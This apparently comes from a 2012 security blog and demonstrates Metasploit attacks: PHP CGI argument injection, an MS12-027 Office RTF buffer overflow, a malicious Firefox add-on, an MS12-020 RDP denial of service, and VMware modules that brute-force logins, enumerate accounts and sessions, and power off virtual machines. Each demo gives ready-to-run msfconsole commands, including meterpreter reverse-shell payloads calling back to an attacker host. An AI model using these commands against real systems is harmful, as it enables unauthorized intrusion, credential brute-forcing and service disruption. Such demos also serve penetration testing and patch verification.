Metasploit

Every thing related to metasploit

CVE-2012-1823 PHP CGI Argument Injection Metasploit Demo

1
1 week ago
in ,

Timeline :

Vulnerability discovered at Nullcon Hackim 2012 by eindbazen the 2012-01-13
Vulnerability reported to the vendor the 2012-01-17
Vulnerability accidentally disclosed on PHP bug tracking system the 2012-05-03
Coordinated public release of the vulnerability the 2012-05-03
Metasploit PoC provided the 2012-05-04

PoC provided by :

egypt
hdm

Reference(s) :

CVE-2012-1823
OSVDB-81633

Affected version(s) :

PHP versions before 5.3.12
PHP versions before 5.4.2

Tested on CentOS release 6.2 (Final) with :

php-common and php-cli 5.3.3-3.el6_2.6 at Fri Feb 3 00:35:09 2012

Description :

When run as a CGI, PHP up to version 5.3.12 and 5.4.2 is vulnerable to an argument injection vulnerability. This module takes advantage of the -d flag to set php.ini directives to achieve code execution. From the advisory: “if there is NO unescaped ‘=’ in the query string, the string is split on ‘+’ (encoded space) characters, urldecoded, passed to a function that escapes shell metacharacters (the “encoded in a system-defined manner” from the RFC) and then passes them to the CGI binary.”

Note : This vulnerability was potentially exploited in the wild for at least 8 years !

Commands :

use exploit/multi/http/php_cgi_arg_injection
set RHOST 192.168.178.210
set TARGETURI /phpinfo.php
set PAYLOAD php/exec
set CMD echo \"owned\">/var/www/html/owned.html
exploit

Metasploit VMware Auxiliary Modules

0
1 week ago
in

Metasploit provide some VMware auxiliary modules who will permit you to fingerprint, gather information’s, enumerate users/groups/permissions, enumerate or terminate user administrative sessions, enumerate virtual machines hosted on ESX/ESXi and power on/off virtual machines.

You can find all these auxiliary modules through the Metasploit search command.

VMWare ESX/ESXi Fingerprint Scanner (esx_fingerprint)

To invoke this auxiliary module just type the following command :

This module attempt try to access to VMware ESX/ESXi Web API interfaces and attempts to identify the running version of ESX/ESXi. Web API interfaces are running on port 443/TCP with “/sdk” default URL, also all connections are encrypted in SSL.

You can run this module against multiple hosts by defining the “RHOSTS” variable. “RHOSTS” variable could be a unique IP address, an IP addresses range (ex : 192.168.1.0-192.168.1.255, or 192.168.1.0/24) or a file (ex : file:/tmp/ip_addresses.txt). Also in order to parallelize brute force attempts, just increase the number of concurrent threads by setting the “THREADS” variable.

VMWare Authentication Daemon Version Scanner (vmauthd_version)

To invoke this auxiliary module just type the following command :

This module will gather information’s about an ESX/ESXi host through the vmauthd service on port 902/TCP.

You can run this module against multiple hosts by defining the “RHOSTS” variable. “RHOSTS” variable could be a unique IP address, an IP addresses range (ex : 192.168.1.0-192.168.1.255, or 192.168.1.0/24) or a file (ex : file:/tmp/ip_addresses.txt). Also in order to parallelize brute force attempts, just increase the number of concurrent threads by setting the “THREADS” variable.

VMWare Web Login Scanner (vmware_http_login)

To invoke this auxiliary module just type the following command :

This module attempts to authenticate to the VMWare HTTP service for VmWare Server, ESX, and ESXi.

You can run this module against multiple hosts by defining the “RHOSTS” variable. “RHOSTS” variable could be a unique IP address, an IP addresses range or a file. This module is also attempting to authenticate using username and password combinations indicated by the “USER_FILE“, “PASS_FILE“, and “USERPASS_FILE” options. You can use SkullSecurity password lists. Also in order to parallelize brute force attempts, just increase the number of concurrent threads by setting the “THREADS” variable.

All valid user and password combinations are in green, invalid login are in red.

VMWare Authentication Daemon Login Scanner (vmauthd_login)

To invoke this auxiliary module just type the following command :

This module will test vmauthd logins on a range of machines and report successful logins.

You can run this module against multiple hosts by defining the “RHOSTS” variable. “RHOSTS” variable could be a unique IP address, an IP addresses range or a file. This module is also attempting to authenticate using username and password combinations indicated by the “USER_FILE“, “PASS_FILE“, and “USERPASS_FILE” options. You can use SkullSecurity password lists. Also in order to parallelize brute force attempts, just increase the number of concurrent threads by setting the “THREADS” variable.

All valid user and password combinations are in green, invalid login are in red.

 

VMWare Enumerate Host Details (vmware_host_details)

To invoke this auxiliary module just type the following command :

This module attempts to enumerate information about the host systems through the VMWare web API.

You can run this module against multiple hosts by defining the “RHOSTS” variable. “RHOSTS” variable could be a unique IP address, an IP addresses range or a file. You have to provide a valid “USERNAME” and “PASSWORD“. In order to parallelize brute force attempts, just increase the number of concurrent threads by setting the “THREADS” variable. Also, you can enumerate hardware details of the host by setting the “HW_DETAILS” option to “true“.

VMWare Enumerate User Accounts (vmware_enum_users)

To invoke this auxiliary module just type the following command :

This module will log into the Web API of VMWare and try to enumerate all the user accounts. If the VMware instance is connected to one or more domains, it will try to enumerate domain users as well.

You can run this module against multiple hosts by defining the “RHOSTS” variable. “RHOSTS” variable could be a unique IP address, an IP addresses range or a file. You have to provide a valid “USERNAME” and “PASSWORD“. Also, in order to parallelize brute force attempts, just increase the number of concurrent threads by setting the “THREADS” variable.

VMWare Enumerate Permissions (vmware_enum_permissions)

To invoke this auxiliary module just type the following command :

This module will log into the Web API of VMWare and try to enumerate all the user/group permissions. Unlike “vmware_enum_users” auxiliary module this is only users and groups that specifically have permissions defined within the VMware product.

You can run this module against multiple hosts by defining the “RHOSTS” variable. “RHOSTS” variable could be a unique IP address, an IP addresses range or a file. You have to provide a valid “USERNAME” and “PASSWORD“. Also, in order to parallelize brute force attempts, just increase the number of concurrent threads by setting the “THREADS” variable.

VMWare Enumerate Active Sessions (vmware_enum_sessions)

To invoke this auxiliary module just type the following command :

This module will log into the Web API of VMware and try to enumerate all the login sessions.

You can run this module against multiple hosts by defining the “RHOSTS” variable. “RHOSTS” variable could be a unique IP address, an IP addresses range or a file. You have to provide a valid “USERNAME” and “PASSWORD“. Also, in order to parallelize brute force attempts, just increase the number of concurrent threads by setting the “THREADS” variable.

Unfortunately this module is not working with VMware ESXi 5.0

VMWare Terminate ESX Login Sessions (terminate_esx_sessions)

To invoke this auxiliary module just type the following command :

This module will log into the Web API of VMWare and try to terminate user login sessions as specified by the session keys.

You can run this module against one host by defining the “RHOST” variable. You have to provide a valid “USERNAME” and “PASSWORD“. Also you have to provide a session key identified by the previous “vmware_enum_sessions” auxiliary module by defining the “KEYS” variable.

Unfortunately this module is not working with VMware ESXi 5.0

VMWare Enumerate Virtual Machines (vmware_enum_vms)

To invoke this auxiliary module just type the following command :

This module attempts to discover virtual machines on any VMWare instance running the web interface. This would include ESX/ESXi and VMWare Server.

You can run this module against multiple hosts by defining the “RHOSTS” variable. “RHOSTS” variable could be a unique IP address, an IP addresses range or a file. You have to provide a valid “USERNAME” and “PASSWORD“. Also, in order to parallelize brute force attempts, just increase the number of concurrent threads by setting the “THREADS” variable. By defining the “SCREENSHOT” variable, the auxiliary module will try to take a screenshot of the running VM.

VMWare Power On Virtual Machine (poweron_vm)

To invoke this auxiliary module just type the following command :

This module will log into the Web API of VMWare and try to power on a specified Virtual Machine.

You can run this module against one host by defining the “RHOST” variable. You have to provide a valid “USERNAME” and “PASSWORD“. Also you have to provide a virtual machine name identified by the previous “vmware_enum_vms” auxiliary module by defining the “VM” variable (for example : set VM CentOS 5.8 i386).

VMWare Tag Virtual Machine (tag_vm)

To invoke this auxiliary module just type the following command :

This module will log into the Web API of VMWare and ‘tag’ a specified Virtual Machine. It does this by logging a user event with user supplied text.

You can run this module against one host by defining the “RHOST” variable. You have to provide a valid “USERNAME” and “PASSWORD“. You have to provide a virtual machine name identified by the previous “vmware_enum_vms” auxiliary module by defining the “VM” variable (for example : set VM CentOS 5.8 i386). Also you have to provide a message through the “MSG” variable.

VMWare Power Off Virtual Machine (poweroff_vm)

To invoke this auxiliary module just type the following command :

This module will log into the Web API of VMWare and try to power off a specified Virtual Machine.

You can run this module against one host by defining the “RHOST” variable. You have to provide a valid “USERNAME” and “PASSWORD“. Also you have to provide a virtual machine name identified by the previous “vmware_enum_vms” auxiliary module by defining the “VM” variable (for example : set VM CentOS 5.8 i386).

MS12-027 MSCOMCTL ActiveX Buffer Overflow Metasploit Demo

0
3 weeks ago
in ,

Timeline :

Vulnerability reported by Unknown to the vendor
Public release of the vulnerability the 2012-04-10
Vulnerability found exploited in targeted attacks the 2012-04-12
Metasploit PoC provided the 2012-04-23

PoC provided by :

Unknown
juan vazquez
sinn3r

Reference(s) :

CVE-2012-0158
MS12-027
OSVDB-81125

Affected version(s) :

Microsoft Office 2003 SP3
Microsoft Office 2003 Web Components SP3
Microsoft Office 2007 SP2
Microsoft Office 2007 SP3
Microsoft Office 2010 32-bit
Microsoft Office 2010 SP1 32-bit
Microsoft SQL Server 2000 Analysis SP4
Microsoft SQL Server 2000 SP4
Microsoft SQL Server 2005 Express Edition with Advanced SP4
Microsoft SQL Server 2005 for 32-bit SP4
Microsoft SQL Server 2005 for x64-bit SP4
Microsoft SQL Server 2008 for 32-bit SP2
Microsoft SQL Server 2008 for 32-bit SP3
Microsoft SQL Server 2008 for x64-bit SP2
Microsoft SQL Server 2008 for x64-bit SP3
Microsoft SQL Server 2008 R2 for 32-bit
Microsoft SQL Server 2008 R2 for x64-bit
Microsoft BizTalk Server 2002 SP1
Microsoft Commerce Server 2002 SP4
Microsoft Commerce Server 2007 SP2
Microsoft Commerce Server 2009
Microsoft Commerce Server 2009 R2
Microsoft Visual FoxPro 8.0 SP1
Microsoft Visual FoxPro 9.0 SP2
Visual Basic 6.0 Runtime

Tested on Windows XP Pro SP3 with :

Microsoft Office Word 2007 (12.0.4518.104)

Description :

This module exploits a stack buffer overflow in MSCOMCTL.OCX. It uses a malicious RTF to embed the specially crafted MSComctlLib.ListViewCtrl.2 Control as exploited in the wild on April 2012. This module targets Office 2007 and Office 2010 targets. The DEP/ASLR bypass on Office 2010 is done with the Ikazuchi ROP chain proposed by Abysssec. This chain uses “msgr3en.dll”, which will load after office got load, so the malicious file must be loaded through “File / Open” to achieve exploitation.

Commands :

use exploit/windows/fileformat/ms12_027_mscomctl_bof
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.21.47
exploit

use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.21.47
exploit -j

getuid
sysinfo

Mozilla Firefox Bootstrapped Add-on Social Engineering Code Execution Metasploit Demo

0
1 month ago
in ,

Timeline :

Vulnerability found Jason Avery the 2007-06-27
Metasploit PoC provided the 2012-04-10

PoC provided by :

mihi

Reference(s) :

None

Affected version(s) :

All versions of Mozilla Firefox

Tested on Windows XP Pro SP3 with :

Mozilla Firefox 11.0

Description :

This exploit dynamically creates a .xpi add-on file. The resulting bootstrapped Firefox add-on is presented to the victim via a web page with. The victim’s Firefox browser will pop a dialog asking if they trust the add-on. Once the user clicks “install”, the add-on is installed and executes the payload with full user permissions. As of Firefox 4, this will work without a restart as the add-on is marked to be “bootstrapped”. As the add-on will execute the payload after each Firefox restart, an option can be given to automatically uninstall the add-on once the payload has been executed.

Commands :

use exploit/multi/browser/firefox_xpi_bootstrapped_addon
set SRVHOST 192.168.178.100
set TARGET 1
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.100
exploit

getuid
sysinfo

MS12-020 Microsoft Remote Desktop (RDP) DoS Metasploit Demo

0
1 month ago
in ,

Timeline :

Vulnerability found by Luigi Auriemma the 2011-05-16
Vulnerability reported by Luigi Auriemma to ZDI
Vulnerability reported to the vendor by ZDI the 2011-08-24
Coordinated public release of the vulnerability the 2012-03-13
Details of the vulnerability published by Luigi Auriemma the 2012-05-16
Metasploit PoC provided the 2012-03-19

PoC provided by :

Luigi Auriemma
Daniel Godas-Lopez
Alex Ionescu
jduck

Reference(s) :

CVE-2012-0002
MS12-020
ZDI-12-044
OSVDB-80004

Affected version(s) :

Windows XP SP3
Windows XP Professional x64 SP2
Windows Server 2003 SP2
Windows Server 2003 x64 SP2
Windows Vista SP2
Windows Vista x64 SP2
Windows Server 2008 32 SP2
Windows Server 2008 x64 SP2
Windows 7 for 32 and Windows 7 32 SP1
Windows 7 for x64 and Windows 7 for x64 SP1
Windows Server 2008 R2 x64 and Windows Server 2008 R2 x64 SP1

Tested on Windows XP Pro SP3

Description :

This module exploits the MS12-020 RDP vulnerability originally discovered and reported by Luigi Auriemma. The flaw can be found in the way the T.125 ConnectMCSPDU packet is handled in the maxChannelIDs field, which will result an invalid pointer being used, therefore causing a denial-of-service condition.

Commands :

use auxiliary/dos/windows/rdp/ms12_020_maxchannelids
SET RHOST 192.168.178.22
exploit

Get Adobe Flash player
Go to Top